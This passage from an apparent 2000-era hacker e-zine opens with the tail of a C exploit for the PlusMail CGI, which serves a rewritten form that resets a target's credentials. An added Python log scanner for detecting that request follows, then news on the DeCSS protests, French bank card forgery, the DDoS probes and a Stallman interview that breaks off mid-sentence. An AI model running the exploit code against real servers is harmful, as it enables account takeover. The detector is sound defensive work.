                       for (tmpline = strtok(origdata, "\n"); tmpline != NULL; tmpline = strtok(NULL, "\n")) {
                               if (strstr(tmpline, "<form action") != NULL)
                                       used = append(htmldata, sizeof(htmldata), used,
                                                     "<form action = \"http://%s/cgi-bin/plusmail\" method = \"post\">\n", target);
                               else
                                       used = append(htmldata, sizeof(htmldata), used, "%s\n", tmpline);
                       }
               }
               if (n < 0) {
                       perror("Error reading reply");
                       return -1;
               }
       
               if (close(sockfd) < 0) {
                       perror("Error closing socket");
                       return -1;
               }
       
               used = append(htmldata, sizeof(htmldata), used, "\n<br>&lt;missnglnk&gt;");
       
               if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
                       perror("Error creating socket");
                       return -1;
               }
       
               printf("waiting on port %d...", lport);
               fflush(stdout);
       
               if (bind(sockfd, (struct sockaddr *) & srv, sizeof(srv)) < 0) {
                       perror("Error binding to socket");
                       return -1;
               }
       
               if (listen(sockfd, 0) < 0) {
                       perror("Error setting backlog");
                       return -1;
               }
       
               if ((clntfd = accept(sockfd, (struct sockaddr *) & clt, &cltlen)) < 0) {
                       perror("Error accepting connection");
                       return -1;
               }
       
               printf("connection from %s:%d\n", inet_ntoa(clt.sin_addr), ntohs(clt.sin_port));
       
               /* bare HTML with no response headers (HTTP/0.9 style); send only the bytes in use */
               if (write(clntfd, htmldata, used) < (ssize_t) used) {
                       perror("Error writing data");
                       return -1;
               }
       
               if (close(clntfd) < 0) {
                       perror("Error closing socket");
                       return -1;
               }
       
               printf("\n%s\n", htmldata);
               return 0;
       }
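The exploit above sends exactly one thing to the target: a POST to /cgi-bin/plusmail whose body carries username, password, password1 and new_login. That request shape is what a defender can look for, since an access log records method, path, status and headers but not the POST body. The script below is an added example, not part of the original zine and not missnglnk's code: it parses combined-format access log lines and flags requests to that CGI. The log format, the sample lines and the severity labels are assumptions constructed for the example; the Referer and User-Agent strings are the ones the exploit hard-codes into its headers.

```python
"""Flag PlusMail credential-reset requests in combined-format access logs.

Added example (not from the original zine, not missnglnk's exploit).
Assumptions: Apache/nginx "combined" log format; the sample lines below
are constructed, not a real capture.
"""
import re
from typing import Dict, List, Optional, Tuple

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

PLUSMAIL_PATH = "/cgi-bin/plusmail"
# Literal strings the exploit above puts in its request headers.
EXPLOIT_REFERER = "http://www.pure-security.net"
EXPLOIT_UA_TAG = "missnglnk"


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None for lines that do not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (severity, reason) for a plusmail-related entry, else None.

    The body is not logged, so method+path is the only reliable signal.
    A 200 on a POST means the CGI processed the form, whatever it held,
    so treat it as a credential change until proven otherwise.
    """
    path = entry["path"].split("?", 1)[0]
    if path != PLUSMAIL_PATH:
        return None
    if entry["method"] != "POST":
        return ("low", "GET of plusmail CGI (probe or normal use)")
    reasons = ["POST to plusmail (possible password reset)"]
    if entry["referer"] == EXPLOIT_REFERER or EXPLOIT_UA_TAG in entry["ua"]:
        reasons.append("request headers match the public exploit")
    if entry["status"] == "200":
        reasons.append("server returned 200, so the form was processed")
        return ("high", "; ".join(reasons))
    return ("medium", "; ".join(reasons))


def scan(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, severity, reason) for every suspicious line."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict is not None:
            hits.append((entry["ip"], verdict[0], verdict[1]))
    return hits


# Constructed sample log (not a real capture). Line 2 is the shape the
# exploit above produces; line 3 is a hand-made POST from an ordinary
# browser against a host without the CGI, which must still be flagged.
SAMPLE_LOG = [
    '203.0.113.7 - - [19/Mar/2000:15:40:01 -0500] "GET /index.html HTTP/1.0" 200 1042 "-" "Mozilla/4.08 [en]"',
    '203.0.113.7 - - [19/Mar/2000:15:40:09 -0500] "POST /cgi-bin/plusmail HTTP/1.0" 200 2311 '
    '"http://www.pure-security.net" "Mozilla/4.08 [en] (X11; I; SunOS 5.7 missnglnk)"',
    '198.51.100.23 - - [19/Mar/2000:16:02:44 -0500] "POST /cgi-bin/plusmail HTTP/1.1" 404 209 "-" "Mozilla/4.7 [en] (WinNT; I)"',
    '198.51.100.23 - - [19/Mar/2000:16:03:10 -0500] "GET /cgi-bin/plusmail?action=login HTTP/1.1" 200 880 "-" "Mozilla/4.7 [en] (WinNT; I)"',
    'garbage line that is not in combined format',
]

if __name__ == "__main__":
    for ip, severity, reason in scan(SAMPLE_LOG):
        print(f"{severity:6} {ip:15} {reason}")
```

The header markers only catch an unmodified copy of the exploit; the variant BlaznWeed mentions in the interview, or anyone who edits two string literals, will not match them. The POST-to-path rule is the one that matters, and a hit on it should be confirmed against the CGI's stored credentials rather than against the log alone.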
      
      @HWA
     
08.0 2600 activism against the MPAA      
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     http://www.2600.com/
     http://www.2600.com/news/2000/0130.html
     
     February 2, 2000

     FOR IMMEDIATE RELEASE
     
     DAY OF ACTION PLANNED AGAINST MOTION PICTURE ASSOCIATION IN 100 CITIES
     
     Members of the hacker and open source communities worldwide, along with
     various civil liberties groups, are planning a massive leafletting
     campaign on Friday, February 4 to call attention to the recent attempts
     by the Motion Picture Association of America to shut down thousands of
     websites. 
     
     Lawsuits have been filed against hundreds of people, as well as an Internet
     Service Provider and a magazine, for having information the MPAA wants
     to keep secret.
     
     The controversy centers around a computer program known as DeCSS, thought to
     be written by a 16-year-old in Norway. The program defeats the encryption 
     scheme used by DVDs, which prohibits them from being viewed on non-approved
     machines or computers. It also enables DVDs from one country to be
     played in another, contrary to the wishes of the movie industry. It does
     NOT facilitate DVD piracy - in fact, copying DVDs has been possible
     since their introduction years ago. In its press releases on the subject,
     the MPAA has claimed that this is a piracy issue, and it has subsequently
     succeeded in getting injunctions against a number of sites that had 
     posted the program in the interests of free speech.
     
     This is in effect a lawsuit against the entire Internet community by
     extremely powerful corporate interests. The lawsuit and the various
     actions being planned promise to be a real showdown between two increasingly
     disparate sides in the technological age. The consequences of losing this
     case are so serious that civil libertarians, professors, lawyers, and a
     wide variety of others have already stepped forward to help out.
     
     Friday's action will be coordinated in 74 cities throughout North America
     and 26 cities in other parts of the world. Leafletting will take place
     outside theaters and video stores in these cities - all of which 
     participate in a monthly "2600" gathering. 2600 Magazine has been named
     in two lawsuits regarding the DeCSS program and has joined with the
     growing number of people who will fight these actions by the MPAA
     until the end.
     
     The lawsuit has been filed by the Motion Picture Association of America,
     Columbia/Tristar, Universal City Studios, Paramount Pictures, Disney
     Enterprises, Twentieth Century Fox, Metro-Goldwyn-Mayer Studios, and
     Time Warner Entertainment.
     
     Contact:
     Emmanuel Goldstein
     (631) 751-2600 ext. 0
      
     leaflet campaign:
     ~~~~~~~~~~~~~~~~~
     
     CALL TO ACTION 

     01/30/00 

     Thousands of copies of the flyer have already
     been distributed at movie theaters worldwide. Versions are also being made 
     in different languages. The next step will involve a massive action this 
     Friday, February 4, 2000. 

     We call on all 2600 meetings held around the world on that day to head to 
     the local theaters and spread the word of this travesty of justice by 
     handing out as many flyers as possible. Everyone is invited to show up and 
     participate, bring your friends, tell your local Linux User Group, spread 
     the news to any organization you're part of, and join us in advocating 
     justice. We find that once people are made aware of the facts of the case, 
     they become as outraged as we have. 

     TIPS FOR HANDING OUT FLYERS 

     First, make sure you make the flyers 
     distinctive by printing on colored paper if at all possible. The quickest 
     way to do this is to go to a copy shop. Get several hundred at the very 
     least - you WILL go through them quickly. Make sure you can print more if 
     you need them. 

     Familiarize yourself with the facts of the case as presented on 
     www.opendvd.org. It's important to be able to answer questions of people 
     who are interested in learning more. Remember, this is NOT about DVD piracy 
     - that is how the movie industry is trying to portray this case. The issue 
     here is CONTROL of players - whether you have the right to play DVDs on 
     the computer of your choice and whether you should be able to see DVDs 
     from other countries - as well as our freedom to continue reporting on the 
     events, developments and discoveries of the hacker community, in a full and 
     accurate manner. 

     We find that people respond well to "Protect Your Rights" as a catch phrase 
     to get them to take the flyer. Let us know if others work for you. Be 
     courteous to the people passing by - don't block their path and, if they 
     ignore you or even make a snide remark, don't heckle them. We find that the 
     vast majority of people are polite and interested in what you have to say. 
     You'll find that some will even come up to you asking for more flyers! Have 
     a set of master copies (printed on white paper) for others to make copies 
     of their own and hand out in other places. 

     If you are asked to leave by theater management, cooperate and ask them 
     where they would like you to stand. They can't force you to leave the area, 
     only the part that is their property. You can still successfully hand out 
     material to everyone coming and going by positioning yourself in 
     neighboring areas or even in the parking lot. If things become unpleasant, 
     simply head to another theater in a different part of town. (If you run out 
     of theaters, you can always fall back on video stores.) We find that 90% of 
     such confrontations can be averted by befriending security guards and 
     making it clear that you don't intend to be disruptive. 
     
     
     @HWA
     
09.0 Microsoft sends magazine full versions of Windows 2000
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
     Contributed by TRDonJuan
     
     (Translated from the German original at the URL below)
     http://www.pcwelt.de/content/news/newwindows/2000/03/xn160300005.html
     
     Win 2000 free on CD

     Microsoft has inadvertently given away 100,000 copies of Windows 2000,
     worth around 33 million dollars, to private users. As the Spanish news
     service Brujula.com reports, Microsoft actually intended to put the
     120-day limited version of the operating system on the cover CDs bundled
     with around 100,000 copies of PC WELT's Spanish sister publication
     "PC World". It later turned out, however, that the software was the
     time-unlimited version, complete with registration code.

     That puts 100,000 unlicensed installations of Windows 2000 into
     circulation. At a selling price of 330 dollars per copy, Microsoft may
     have suffered a financial loss of 33 million dollars.

     Who caused the error has not yet been officially established. Insiders
     assume, however, that it was not the magazine but Microsoft itself that
     was responsible for the slip-up. Some even whisper that Microsoft put the
     full version on the CDs deliberately, to drive up Windows 2000's sales
     figures, and then declared the whole thing an accident, because the
     software giant, given the monopoly position it is accused of holding,
     could not officially give the operating system away.

     In any case, the issue of PC World Spain that carried the CD-ROM set a
     sales record. (PC-WELT, 16.03.2000, sp)     
     
     @HWA

10.0  HNN:Mar 13th:Mexican Rebels Breached Pentagon Security 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

      From HNN http://www.hackernews.com/


      contributed by William Knowles 
      According to Arthur L. Money, the chief information
      officer of the US Defense Department, Mexican
      Zapatista guerrillas managed to breach the online
      security systems of some Pentagon computers in 1998.
      Money said that the intruders used systems at the
      Frankfurt Stock Exchange to launch their attacks. 

      Agence France-Press - via Nando Times 
      http://www.techserver.com/noframes/story/0,2294,500179791-500236658-501166899-0,00.html
      (Sorry: 404 or expired story link)
      
      @HWA
      
11.0  HNN:Mar 13th:Online Guerrilla War Rages In Brazil 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Online warez groups fighting amongst each other is now
      considered guerrilla warfare by authorities in Brazil.
      According to the daily O Globo the Brazilian Hacker
      Organization (OHB) and the Anti-OHB have been trading
      insults via web defacements for some time. The Sao
      Paulo Civil Police Cybercrime Unit is also following
      attacks by three other active organizations: Hatted
      Copr, InfernBr and Crime Boys. 

      EFE via COMTEX - via Northern Light
      http://library.northernlight.com/FC20000310060000049.html?cb=0&dx=1006&sc=0#doc
      (Pay to play document sorry ...  - Ed)
      
      @HWA

12.0  HNN:Mar 13th:French Bank Card Algorithm Released 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by alan.hop 
      Serge Humpich was given a ten-month suspended
      sentence after notifying the French interbank group
      Cartes Bancaires that its bank cards were vulnerable
      to fraud. Now the secret that Humpich discovered has
      been released on the Internet. Bank officials say that
      the potential for fraud or fake cards is small, while
      security experts fear that the underground will flood the
      market with fake cards within weeks. 

      Reuters - via Yahoo              
      http://dailynews.yahoo.com/h/nm/20000310/wr/france_cards_1.html
      
      Friday March 10 3:07 PM ET 

      Card Alert for French Banks

      By Catherine Bremer

      PARIS (Reuters) - France braced for a wave of petty fraud after officials 
      admitted on Friday that a formula posted on the Internet showed how to 
      forge smart payment cards.

      But Cartes Bancaires, the French interbank group whose card system is 
      affected, said there was no danger that bank accounts would be emptied.

      Cards made with the formula might be used to buy train tickets or pay 
      parking meters or toll booths although there was no evidence this had 
      actually happened, Cartes Bancaires spokesman Herve de Lacotte told 
      Reuters.

      ``For the first time in 10 years, a lock has been sprung,'' he said. ``But 
      springing a lock will not necessarily open the door and let you in. There 
      is a theoretical risk of fraud but the problem concerns banks, not 
      consumers or shops.''

      Despite claims to the contrary, Lacotte said, false cards made with the 
      code could not be used in cash dispensers, to make shop purchases or for 
      expensive goods.

      Newspapers leaped on the story, quoting experts as saying the complex 
      96-digit code could be used to forge three in four of France's 34 million 
      bank cards.

      Headlines like ``Chip card secret out'' left anyone with a bank card 
      wondering whether their money was safe.

      ``Consumers have been paying for bank cards that aren't even secure. 
      They've been cheated and lied to,'' said Eric April, Secretary-General of 
      the AFOC consumer group.

      Lacotte said the scare stories were over the top and the Bank of France 
      accused the press of ``exaggerating the risk.''

      ``Even if certain clues relating to this algorithm have been made 
      public... other security measures exist enabling strong limits on the use 
      that can be made of this information,'' the French central bank said in a 
      statement.

      Cards issued since last autumn had added security which meant the pirate 
      formula would not work for them, he added.

      SCSSI, the government body in charge of information security systems, 
      urged banks to replace older cards with updated ones.

      The card formula was posted anonymously on an Internet chat site last 
      weekend. It was actually discovered three years ago by computer whizz kid 
      Serge Humpich, who denies using or circulating it but has been given a 
      10-month suspended prison sentence for cracking the banks' secret.

      Now that it is public, Humpich says, pirates could buy a chip card kit for 
      around $370 and be turning out false cards within weeks.

      ``A few weeks from now dozens of false cards are going to appear,'' he 
      told Liberation. 

     
     @HWA
     
13.0  HNN:Mar 13th:Still No Suspects in DDoS Attacks 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Investigators are still sifting through mountains of log
      files but are having a rough time tracing the recent
      denial of service attacks against online giants Yahoo,
      ZD Net, CNN, and others. Officials still do not have any
      suspects and hope that more traditional methods will
      allow them to locate the culprit(s). 

      San Jose Mercury News      
      http://www.mercurycenter.com/svtech/news/indepth/docs/hack031000.htm
      
      Posted at 8:28 p.m. PST Thursday, March 9, 2000 

      No suspects in cyberattacks

      Investigators try to track down origin of last month's assaults

      BY DAVID L. WILSON       Mercury News Washington Bureau 

      WASHINGTON -- Federal authorities are continuing to investigate last 
      month's series of attacks on commercial Internet sites, but sources 
      close to the investigation say they have no suspects yet.

      Investigators are sifting through mountains of data, trying to track the 
      attacks back to their origin using logs from the computers involved, but 
      they concede that building a case using such methods may be difficult, if 
      not impossible. Some believe that a break in the case is more likely to come 
      from more traditional methods.

      ``Often what you see in a cold case is a lead coming from someone who is 
      in custody on an unrelated minor charge who offers information in return 
      for a get-out-of-jail-free card,'' said one person with ties to the 
      investigation. ``If somebody brags that he was behind this, eventually 
      somebody else will roll over on him.''

      Often, however, the braggarts are blowing smoke. For instance, a 
      17-year-old who goes by the moniker ``Coolio'' hinted in online chats that 
      he was behind at least some of the attacks. But federal authorities 
      say there is no evidence that the youth, Dennis Moran of Wolfboro, N.H., 
      was involved. However, on Wednesday Moran was charged with two counts of 
      unauthorized access to a computer system in connection with vandalism to 
      the Los Angeles Police Department Web site DARE.com. 

      In last month's attacks on popular Web sites such as Yahoo, eBay and CNN, 
      suspects used a specialized technique known as a distributed denial of 
      service attack. The technique depends on stealth software that has 
      been secretly installed on hundreds of computers connected to the 
      Internet. At a given signal, the programs attack a targeted Web site, 
      flooding it with so much data that normal business is impossible.

      Investigators are using log files from the computers infected with the 
      stealth software, hoping to track the trail back to the individual who 
      installed the programs, but they have been unsuccessful so far.

      The difficulties investigators face were summed up in a 60-page report the 
      federal government released Thursday. In a news conference discussing the 
      report, Attorney General Janet Reno said law enforcement faces a 
      number of challenges in cyberspace.

      ``These challenges include the inability to trace criminals who hide their 
      identities online, difficulty in finding criminals who might be located in 
      other jurisdictions, the need for better coordination among law 
      enforcement agencies, and the need for trained personnel at all levels of 
      law enforcement,'' Reno told reporters.

      The report generally said that existing laws could deal with crimes in 
      cyberspace. In addition, while highlighting advantages criminals can gain 
      from anonymity on the Internet, the report stressed that anonymity       
      is both important and useful for average citizens. It suggested that any 
      proposed changes in the availability and use of anonymity must be 
      considered very carefully.

      Despite the report's measured tone, some groups feared a loss of privacy 
      for individuals who could find their every movement in cyberspace tracked 
      if they couldn't maintain anonymity.

      The American Civil Liberties Union blasted the report in a letter to Reno. 
      ``An end to Internet anonymity would chill free expression in 
      cyberspace,'' the letter declared. ``However, the report treats the 
      anonymity of Internet users as a `thorny issue' rather than a 
      constitutional right.''

      Administration officials said the report was merely a starting point for 
      an examination of security in cyberspace, and that the government was 
      fully committed to maintaining privacy for Internet users.

 
      Contact David L. Wilson at (202) 383-6020 or dwilson@sjmercury.com

      @HWA
      
14.0  HNN:Mar 13th:Japanese Pirates Busted 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      In a report released on March 10th, the Associated
      Computer Software Copyright Society (ACCS) disclosed
      two recent cases of piracy involving Internet bulletin
      boards. A Hokkaido University student living in Sapporo
      was arrested for selling as many as 30 illegal copies of
      Microsoft's Office 2000 Professional and other software.
      He charged a total of 500,000 yen (US$4,693.51) for
      the CDR copies. A 24-year-old worker living in Takasaki,
      Gunma prefecture was also recently arrested for
      advertising and selling illegal software via an Internet
      bulletin board. He sold software to 20 people for
      100,000 yen (US$938.70). He said that he began selling
      pirated software after he purchased some in the same
      way. 

      Asia Biz Tech 
      http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/news/96759
      
       
      Pirated Software Sales Rampant on Internet Bulletin Board 
 
      March 13, 2000 (TOKYO) -- A series of recent cases have revealed the extent 
      to which Internet bulletin boards are being used in Japan to sell pirated 
      software.
 
      The Associated Computer Software Copyright Society (ACCS) disclosed the 
      extent of the situation on March 10.
 
      In just the last 10 days, two cases of copyright violation have been 
      brought to light by the Metropolitan Police Agency and the Aichi Prefecture 
      Police.
 
      On Feb. 29, the Metropolitan Police Agency submitted documents to the Tokyo 
      District Public Prosecutors Office regarding the activities of a 
      22-year-old Hokkaido University student living in Sapporo. The student was 
      using an electronic bulletin board to advertise the sale of pirated 
      software and was accepting orders via e-mail.
 
      The items included Microsoft's Office 2000 Professional as well as other 
      office and game software copied to CD-R disks without the copyright 
      holders' permission.
 
      Between February and October 1999, the student reportedly sold illegally 
      copied software to some 30 individuals nationwide for a total of about 
      500,000 yen. (106.53 yen = US$1)
 
      The other incident, uncovered by the high-tech crime unit of the Aichi 
      Prefecture Police, involved a 24-year-old worker living in Takasaki, Gunma 
      prefecture. A report on the suspect was submitted to the Nagoya District 
      Public Prosecutors Office on March 1.
 
      Like the Sapporo student, the suspect is accused of using a bulletin board 
      operated by a leading Internet service provider to advertise the sale of 
      pirated software and accept online orders. The accused is believed to have 
      sold the software to 20 people during the course of about one month, 
      generating some 100,000 yen in sales. He reportedly confessed that he began 
      selling pirated software after buying it in a similar manner himself.
 
      (BizTech News Dept.)
                 
      @HWA      
      
15.0  HNN:Mar 13th:Online Handles Impose Fear 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      Are the handles chosen by online hooligans picked in an
      attempt to impose fear? Matt Richtel of the NY Times
      attempts to explore the meanings of some of the more
      glamorous handles of the online world. (Too bad he
      completely misses the personal privacy angle. And what
      about entertainers like Sting, Madonna, John Cougar, or
      Prince?) 

      NY Times 
      http://www.nytimes.com/library/review/031200hacker-handles-review.html
      (Pay to play url... sorry -Ed)     
      
      @HWA     

16.0  HNN:Mar 13th:Vendors Still Making Insecure Software 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Weld Pond 
      At a recent congressional panel examining the threat to
      federal and private-sector computer networks, cyber
      security experts blamed software manufacturers for
      failing to improve the security features of most
      consumer software. (People in the underground have
      been saying this for years.) 

      Reuters - via Excite 
      http://news.excite.com/news/r/000309/15/net-tech-hacker
      (Server:We're sorry, but this story is not currently available - Ed)
      
      
      @HWA
      
17.0  HNN:Mar 14th:Smart Card Inventor Issues Challenge 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acoplayse 
      Roland Moreno, whose invention, the smart card, has
      slashed the fraud rate in France by 90 percent in 10
      years, rejected claims that an algorithm posted on a
      Web chat site last week could bypass the cards'
      safeguards. He is so confident of his product that he is
      offering a million francs ($148,100) to anyone who could
      prove that they could read a bank's confidential code
      from the card. Moreno went on to claim that "chip cards
      are an unpenetrable data system." (So unpenetrable
      that Serge Humpich recently received a 10 month
      suspended sentence for defeating the system.) 

      Reuters       
      http://newsnet.reuters.com/cgi-bin/basketview.cgi?b=rcom:science&s=nL133221
      
      
      From above url;
      
      "Boston conventions threaten biotech food fight"...
      <snip>
      
      
      (Appears to be incorrectly linked .. not having much luck
       following up articles this week :/ sorree .. - Ed)
      
      
      @HWA      
      
18.0  HNN:Mar 14th:MPAA Continues to Harass In Fight Over DeCSS 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Macki 
      In the past two months the Motion Picture Association
      of America has continued to harass and intimidate
      Internet users all over the world. Letters have been
      sent, threats have been levied, ISPs have crumbled,
      people have been fired from their jobs and worse. The
      fight is not over. 

      2600 <see elsewhere this issue>
      http://www.2600.com/news/2000/0312.html
      
      Open DVD       
      http://www.opendvd.org/
      
      @HWA
      
19.0  HNN:Mar 14th:Tracking Down Coolio
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/ 

      contributed by Carlos 
      Log file analysis and a search engine, those were the
      most complicated tools needed to track down Coolio
      (Dennis Moran). Coolio was charged last week with
      defacing the Dare.org web site. (And this is what the
      FBI wants all that extra money for?) 

      Associated Press - via ABC News
      http://www.abcnews.go.com/sections/tech/DailyNews/coolio000313.html      
      
      
      On the Trail of a Hacker 


      Court Papers Reveal How Cyber Gumshoe Tracked Teen

      Photo: Dennis Moran, 17, who goes by the name "Coolio" on the Internet,
      talks with reporters March 8, near his Wolfeboro, N.H., home after
      being questioned by the FBI about crippling attacks on major Web sites
      in February. (Ken Williams/Concord Monitor/AP Photo)
      http://www.abcnews.go.com/media/Tech/images/ap_hacker_000313_h.jpg
      

      The Associated Press
      
      WOLFEBORO, N.H., March 13 -- Recently
      released court records explain how authorities
      traced the hacking attack on a popular anti-drug
      Web site to a Wolfeboro teenager. 
          Dennis Moran, 17, was charged last week with hacking
      into the Web site of DARE.org and defacing it with
      pro-drug abuse slogans and images.
           He has acknowledged he vandalized the Los
      Angeles-based site and two others, but said he was only
      joking when he claimed responsibility for the attacks that
      crippled Yahoo, eBay and other major sites last month.
           Court records released Friday show police began
      investigating Moran after noticing his Internet nickname,
      Coolio, on the defaced DARE.org site in November.
      
           At the bottom of the Web site were the messages
      "Coolio is k-r4d and so are drugs" and "Craftily owned
      by Coolio :D." 

      Searching in Cyberspace
      Los Angeles Police Detective Michael Brausman used a
      search engine to find a Web page that included an e-mail
      address for coolio@k-r4d.com. He traced the address to
      another site that included a directory labeled Coolio.
      Inside the directory was one of the images posted on the
      DARE site.
      
           By late December, the detective had contacted the
      owner of an Arizona-based server who confirmed he had
      e-mail messages related to the Coolio directory. A search
      of the server's logs showed someone using the e-mail
      address coolio@k-r4d.com had sent messages that included
      Moran's name, address and phone number.
      
           In one message, Moran inquired about registering
      cool.io as an Internet domain name.
           
           "If there's any way I could buy the domain for this,
      please email me pricing and information. Thanks, Dennis
      Moran," he wrote.
           
           Brausman called Wolfeboro police Dec. 30.
      Investigators interviewed Moran on Feb. 17.
           Moran faces two state charges of unauthorized access
      to a computer system. Each felony is punishable by up to
      15 years in prison and a $4,000 fine.
           
           Although Moran also was questioned by the FBI
      about several denial of service attacks on major
      commercial sites, including Yahoo.com and eBay.com,
      no charges have been filed in those cases.
      
           Investigators said they were seeking someone using the
      Internet signer Coolio in those attacks, but also said the
      name is used by many people online. 
      
      @HWA
      
20.0  HNN:Mar 14th: DOJ Launches Cybercrime Site 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by Evil Wench 
      The US Department of Justice has officially launched a
      cybercrime web site defining computer crime and
      describing how to report it. The site also includes
      department's latest thinking on privacy vs. policing on
      the Internet as well as computer search and seizure
      guidelines. 

      Associated Press - via Nando Times
      http://www.techserver.com/noframes/story/0,2294,500180192-500237416-501173875-0,00.html
      (Sorry dead link ... -Ed :( )
      
      
      Cybercrime.gov      
      http://www.cybercrime.gov/
      
      @HWA
      
21.0  HNN:Mar 14th: China Relaxes Crypto Rules 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/

      contributed by acoplayse 
      After pressure from the US-China Business Council,
      Chinese authorities have agreed to "clarify" encryption
      regulations that were published in October last year.
      The State Encryption Management Commission (SEMC),
      which reports to the Ministry of State Security, has said
      that only hardware or software for which encryption is a
      core function will be limited by the regulations. Products
      that contain encryption as a secondary function will no
      longer be restricted. This includes browsers, consumer
      electronics and other items. 

      Financial Times       
      http://news.ft.com/ft/gx.cgi/ftc?pagename=View&c=Article&cid=FT3ZAN1CS5C&
      live=true&useoverridetemplate=ZZZFKOXOA0C&tagid=ZZZC00L1B0C&subheading=
      information%20technology&_ref=526610871
      
      China softens rules on encryption
      By James Kynge - 13 Mar 2000 22:06GMT

      China has backed away from sweeping restrictions on the use and sale of foreign
      encryption technology that would have wreaked havoc on the use of foreign
      software, mobile phones, e-mail and other communications applications. 

      The US-China Business Council, which led a lobbying effort that united several
      national chambers of commerce in Beijing, said on Monday that Chinese
      authorities had agreed to "clarify" encryption regulations published in October last
      year. 

      The main sense of the clarification was that only hardware or software for which
      encryption is a core function will be limited by the regulations of the State
      Encryption Management Commission (SEMC), a body that reports to China's
      intelligence agency, the Ministry of State Security. 

      This means that mobile phone handsets, Windows software, browser software
      and other applications that contain encryption as an ancillary function will not now
      be restricted. 

      Windows 2000, Microsoft Corp's newest operating system, which is set to be
      launched in China on March 20, was given approval for sale this month by
      authorities, prefiguring the relaxation in SEMC's rules. 

      It was not immediately clear what types of products would fall under the definition
      of having encryption as a core function. Under the SEMC's original restrictions, all
      businesses and individuals would have had to register with the government any
      products containing encryption technology. 

      They then would have had to apply for permission to use the goods. 

      But a clarification letter issued by the SEMC allayed fears the government would
      gain access to corporate secrets carried in encoded communications by requiring
      companies to hand over their encryption source codes. 

      Business travellers carrying laptops with ordinary software, even if it contains
      some encryption capabilities, are not required to register, the US-China Business
      Council quoted the SEMC as saying in a verbal clarification of the regulations. 
      
      @HWA
      
22.0  HNN:Mar 14th:Stallman on UCITA 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/


      contributed by Weld Pond 
      The Uniform Computer Information Transaction Act will
      threaten the existence of free software if passed.
      Richard Stallman the founder of the Free Software
      Foundation has spoken out vehemently about this
      legislation and continues to do so. 

      ZD Net 
      http://www.zdnet.com/zdnn/stories/news/0,4586,2457092,00.html
      
      Interview: GNU guru Richard Stallman
      
      The president of the Free Software Foundation and founder of the 
      free-software movement speaks out against UCITA.

 

      By Robert Lemos, ZDNet News       March 12, 2000 3:44 PM PT 

 
      When Richard Stallman founded the GNU (or Gnu's Not Unix) Project in 
      1984, his aim was to create Unix-compatible tools that were free. 
      Sixteen years later, GNU software is a critical part of most Unix 
      systems and forms the basis -- along with Linus Torvalds' Linux kernel 
      -- of all Linux systems. 

      With the proposed Uniform Computer Information Transaction Act (UCITA) 
      threatening the free-software movement, ZDNet News Senior Editor Robert 
      Lemos caught up with Stallman, president of the Free Software 
      Foundation, in India. 

      ZDNet: What will be the effect of UCITA on the free software movement? 

      Stallman: UCITA would make it harder for us to avoid liability for bugs 
      that turn up in the free software we develop -- while giving proprietary 
      software developers a very easy way to avoid all liability for their 
      products, even for faults that they know about in advance. This is 
      grossly unfair. 

      UCITA would also give proprietary software developers a way to prohibit 
      reverse engineering. They could then promulgate secret formats for 
      distributing and storing data and stop us from implementing free 
      software to handle those formats. We would be unable to provide you with 
      software to access your own data. 

      ZDNet: What will be the effect on GNU development? What about GNU/Linux? 

      Stallman: I don't expect UCITA to have any immediate effect on our 
      software development. But in the long term we will probably have trouble 
      making our software handle the secret data formats and support new 
      hardware whose specifications are secret. 

      Microsoft already said they plan to use secret formats and protocols to 
      block the development of (GNU/) Linux. The format of Word is already a 
      secret, and it is only through reverse engineering that people can 
      figure out anything about it. 

      ZDNet: Will software be worse because of UCITA? 

      Stallman: That is the wrong question. The right question is how will 
      users of software be worse off because of UCITA? 

      I've already explained the problems free software will face. We will 
      face additional obstacles to doing a good job. For non-free software, 
      developers will not face additional obstacles, but they will be able to 
